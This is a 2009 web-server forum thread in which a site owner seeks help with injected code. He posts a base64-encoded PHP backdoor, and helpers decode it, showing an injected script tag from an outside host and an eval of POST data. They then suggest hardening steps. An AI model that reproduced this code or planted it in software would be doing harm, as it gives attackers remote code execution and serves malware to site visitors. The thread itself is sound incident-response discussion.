some weird script that look like a virus

 
Post new topic   Reply to topic    Aprelium Forum Index -> PHP
View previous topic :: View next topic  
Author Message
spthai
-


Joined: 16 Oct 2009
Posts: 5

PostPosted: Mon Oct 26, 2009 4:33 am    Post subject: some weird script that look like a virus Reply with quote

Have anyone ever had a weird script line that look like a virus, it looks something like this

jf;akjf;lkjf;lkdsajflksjkhj9werln, ljf ....and so on at the header of the files.

I think this is a hacking attempt. And google will filter your sites as a danger site.

If you guys ever experience this, then how you prevent the hacker for intruding your files again?

Thanks
_________________
Cosmetic Surgery Thailand
Plastic Surgery Thailand
Back to top View user's profile Send private message Visit poster's website
Toasty
-


Joined: 21 Feb 2008
Posts: 298
Location: Chicago, IL

PostPosted: Wed Oct 28, 2009 3:27 am    Post subject: Reply with quote

We're going to need more details. It's possible that it's an eval for a base64 statement. I'm guessing that's not an abstract of the actual code, hence why I need more of it to see.
_________________
Audit the secure configuration of your server headers!
Back to top View user's profile Send private message Visit poster's website
spthai
-


Joined: 16 Oct 2009
Posts: 5

PostPosted: Fri Nov 20, 2009 11:24 am    Post subject: Reply with quote

Quote:
<?php eval(base64_decode('aWYoIWlzc2V0KCRneTAxKSl7ZnVuY3Rpb24gZ3kwKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkZ1Ym5WaGNtbDBZUzV5WVdSdmJTNXdiQzlyYzJsbFoyRXZZMjkxYm5RdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBneTAyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGd5MDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGd5MDEpKWNhbGxfdXNlcl9mdW5jKCRneTAxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2d5MCcpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdneTAnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kZ3kwbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignZ3kwMicpKSE9J2d5MDInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php
/* Short and sweet */


Here's the code... I still have problem preventing the hacker to come back and install the code on my files. He keep coming back and put the code back when I delete it.[/quote]
_________________
Cosmetic Surgery Thailand
Plastic Surgery Thailand
Back to top View user's profile Send private message Visit poster's website
DonQuichote
-


Joined: 24 Dec 2006
Posts: 68
Location: The Netherlands

PostPosted: Sun Nov 22, 2009 7:05 pm    Post subject: Access Reply with quote

Well, the hacker must get access somehow. It is up to you to investigate what possibilities the hacker has. Does the web server user have write access to the served directories? In that case, everything can be done through PHP. Simply deny the web server user that write access.

But it could also be that another service is hacked. If you have enabled root login for SSH, for example. What OS are you using?
Back to top View user's profile Send private message
Toasty
-


Joined: 21 Feb 2008
Posts: 298
Location: Chicago, IL

PostPosted: Wed Nov 25, 2009 5:21 pm    Post subject: Reply with quote

I'm looking through what you posted now, I'll post my results soon.
_________________
Audit the secure configuration of your server headers!
Back to top View user's profile Send private message Visit poster's website
Toasty
-


Joined: 21 Feb 2008
Posts: 298
Location: Chicago, IL

PostPosted: Wed Nov 25, 2009 5:33 pm    Post subject: Reply with quote

Update:

I'm not 100% sure what this script does, but I highly suggest you start checking your system for holes (file inclusion holes especially).

Here's the code that script executes:

Code:
<?PHP
if(!isset($gy01))
   {
   function gy0($s)
      {
      if(preg_match_all('#<script(.*?)</script>#is',$s,$a)) foreach($a[0] as $v)if(count(explode("\n",$v))>5)
         {
         $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
         if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
         }
      if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
      $s=str_replace($a="<script src=http://annuarita.radom.pl/ksiega/count.php ></script>",'',$s);
      if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
      elseif(strpos($s,',a'))$s.=$a;return $s;}
      function gy02($a,$b,$c,$d)
      {
      global $gy01;$s=array();
      if(function_exists($gy01))call_user_func($gy01,$a,$b,$c,$d);
      foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='gy0')return;
      elseif($a=='ob_gzhandler')
      break;
      else
      $s[]=array($a=='default output handler'?false:$a);
      for($i=count($s)-1;$i>=0;$i--)
         {
         $s[$i][1]=ob_get_contents();ob_end_clean();
         }
      ob_start('gy0');
      for($i=0;$i<count($s);$i++)
         {
         ob_start($s[$i][0]);echo $s[$i][1];
         }
      }
   }
$gy0l=(($a=@set_error_handler('gy02'))!='gy02')?$a:0;
eval(base64_decode($_POST['e']));
?>



I DO NOT think this will run, because I'm sure (hope) that Aprelium has some character filters.

You'll notice the script URL in there, that was encoded again, even after the original encode, telling me that was "super secret!!!"

Well, I traced the link, and it is already known as a malicious site (see Google's Safe Browsing page (safe to click)).


One suggestions is you add a line to your header file, or do an auto_prepend in your php.ini to include code like this:

<?PHP
if file_exists("name_of_that_file.php")
{
unlink("name_of_that_file.php");
}
?>

That will delete it any time a PHP page is loaded -- including the script itself, should it be PHP.[/url]
_________________
Audit the secure configuration of your server headers!


Last edited by Toasty on Wed Nov 25, 2009 5:35 pm; edited 1 time in total
Back to top View user's profile Send private message Visit poster's website
Toasty
-


Joined: 21 Feb 2008
Posts: 298
Location: Chicago, IL

PostPosted: Wed Nov 25, 2009 5:34 pm    Post subject: Reply with quote

(Delete this post)

I accidentally clicked submit twice.
_________________
Audit the secure configuration of your server headers!
Back to top View user's profile Send private message Visit poster's website
DonQuichote
-


Joined: 24 Dec 2006
Posts: 68
Location: The Netherlands

PostPosted: Wed Nov 25, 2009 8:58 pm    Post subject: Get rid of this now. Reply with quote

The last line is the best:
Code:
eval(base64_decode($_POST['e']));

This will happily execute anything that the hacker wants on your server (unless you disabled the eval function). So I suggest you take it off-line and only bring it back up onece you really know you are safe.
Back to top View user's profile Send private message
Toasty
-


Joined: 21 Feb 2008
Posts: 298
Location: Chicago, IL

PostPosted: Wed Nov 25, 2009 9:08 pm    Post subject: Reply with quote

^Oops. I seen that line before too, failed to mention it.

Nice catch.


spthai, if you're running any "prefab" software (for example: Joomla, phpBB, Drupal, Invision, etc) could you let us know? If you include the versions, I can do some more looking around and see if there's a file inclusion hole, or an upload hole that can be exploited.

If the software you're using is built by yourself, make sure all variables provided from the client (REFERRER, POST, GET, COOKIE, REQUEST, and so on) are filtered at the beginning of the script (with regular expressions preferably).

The next step after the filtering would be to set:

register_globals = off;

In your PHP.INI. Apreliums pre-configured PHP packages ship with this option set to on, and while it is convenient, it's a serious security exploit -- and will be a removed feature once PHP 6 rolls out.
_________________
Audit the secure configuration of your server headers!
Back to top View user's profile Send private message Visit poster's website
Display posts from previous:   
Post new topic   Reply to topic    Aprelium Forum Index -> PHP All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB phpBB Group